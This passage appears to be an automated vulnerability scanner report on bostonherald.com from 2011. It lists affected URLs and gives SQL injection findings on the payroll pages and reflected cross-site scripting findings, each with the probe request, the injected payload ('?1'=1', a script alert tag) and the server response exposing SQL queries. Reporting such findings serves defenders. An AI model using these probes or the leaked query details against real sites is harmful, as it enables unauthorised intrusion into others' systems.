8.200. http://www.bostonherald.com/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=recent_bullet

8.201. http://www.bostonherald.com/track/star_tracks/view/20110128seiji_ozawa_has_back_surgery/srvc=track&position=also

8.202. http://www.bostonherald.com/track/star_tracks/view/20110128startracks/srvc=home&position=also

8.203. http://www.bostonherald.com/track/track_gals_tv/

8.204. http://www.bostonherald.com/users/register

8.205. http://www.bostonherald.com/users/register/

8.206. http://www.bostonherald.com/weather/

9. File upload functionality

9.1. http://www.bostonherald.com/about/contact/news_tip.bg

9.2. http://www.bostonherald.com/sports/football/patriot_moments/

10. Email addresses disclosed

10.1. http://www.bostonherald.com/about/contact/

10.2. http://www.bostonherald.com/about/home_delivery/

10.3. http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/

10.4. http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/

10.5. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

10.6. http://www.bostonherald.com/blogs/news/on_the_t/

10.7. http://www.bostonherald.com/business/general/view.bg

10.8. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

10.9. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also

10.10. http://www.bostonherald.com/business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also

10.11. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

10.12. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6

10.13. http://www.bostonherald.com/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also

10.14. http://www.bostonherald.com/business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

10.15. http://www.bostonherald.com/entertainment/movies/reviews/view.bg

10.16. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

10.17. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2

10.18. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also

10.19. http://www.bostonherald.com/entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also

10.20. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

10.21. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

10.22. http://www.bostonherald.com/mediacenter/

10.23. http://www.bostonherald.com/mediacenter/index.php

10.24. http://www.bostonherald.com/news/opinion/

10.25. http://www.bostonherald.com/news/politics/view.bg

10.26. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

10.27. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1

10.28. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

10.29. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0

10.30. http://www.bostonherald.com/news/regional/gardner_heist/

10.31. http://www.bostonherald.com/news/regional/view.bg

10.32. http://www.bostonherald.com/news/regional/view.bg

10.33. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

10.34. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also

10.35. http://www.bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also

10.36. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

10.37. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4

10.38. http://www.bostonherald.com/projects/boston_pensions/

10.39. http://www.bostonherald.com/projects/bra/

10.40. http://www.bostonherald.com/projects/buybacks/

10.41. http://www.bostonherald.com/projects/consultants/

10.42. http://www.bostonherald.com/projects/edic/

10.43. http://www.bostonherald.com/projects/lawyer_pay/

10.44. http://www.bostonherald.com/projects/mta2008/

10.45. http://www.bostonherald.com/projects/payroll/brockton/

10.46. http://www.bostonherald.com/projects/payroll/cambridge/

10.47. http://www.bostonherald.com/projects/payroll/cca/

10.48. http://www.bostonherald.com/projects/payroll/mass_pike/

10.49. http://www.bostonherald.com/projects/payroll/quasi_state/

10.50. http://www.bostonherald.com/projects/payroll/quincy/

10.51. http://www.bostonherald.com/projects/payroll/springfield/

10.52. http://www.bostonherald.com/projects/payroll/suffolk/

10.53. http://www.bostonherald.com/projects/payroll/worcester/

10.54. http://www.bostonherald.com/projects/your_tax_dollars.bg

10.55. http://www.bostonherald.com/projects/your_tax_dollars.bg

10.56. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

10.57. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also

10.58. http://www.bostonherald.com/sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also

10.59. http://www.bostonherald.com/sports/football/patriots/view.bg

10.60. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

10.61. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7

10.62. http://www.bostonherald.com/store/

10.63. http://www.bostonherald.com/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also

10.64. http://www.bostonherald.com/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also

10.65. http://www.bostonherald.com/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also

11. Content type incorrectly stated

11.1. http://www.bostonherald.com/home/includes/twitter.inc

11.2. http://www.bostonherald.com/projects/boston_pensions/

11.3. http://www.bostonherald.com/track/includes/twitter.inc



1. SQL injection
There are 6 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights from occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/cambridge/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/cambridge/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 451
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.2. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/mass_pike/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/mass_pike/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:29:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 319
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.3. http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quasi_state/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/quasi_state/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:39:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 492
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.*, b.agency FROM `quasi_state_data` a INNER JOIN `quasi_state_agencies` b ON a.quasi_state_agency_id = b.id WHERE 1=1 ORDER BY ?1\'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1\'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.4. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/quincy/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/quincy/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:36:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 317
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.5. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/suffolk/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/suffolk/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:35:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 319
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

1.6. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /projects/payroll/worcester/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /projects/payroll/worcester/?1'=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:42:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 323
Content-Type: text/html; charset=UTF-8
Connection: close


SQL:
SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20

Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br>
...[SNIP]...

2. Cross-site scripting (reflected)
There are 42 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4afcc"><script>alert(1)</script>d82b4897c0c was submitted in the REST URL parameter 5. This input was echoed as 4afcc\"><script>alert(1)</script>d82b4897c0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/20114afcc"><script>alert(1)</script>d82b4897c0c/01/27/van-halen-recording-with-celine-dion-producer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:09:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/20114afcc\"><script>alert(1)</script>d82b4897c0c/01/27/van-halen-recording-with-celine-dion-producer/">
...[SNIP]...

2.2. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70037"><script>alert(1)</script>7feba13b723 was submitted in the REST URL parameter 6. This input was echoed as 70037\"><script>alert(1)</script>7feba13b723 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/2011/0170037"><script>alert(1)</script>7feba13b723/27/van-halen-recording-with-celine-dion-producer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:10:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

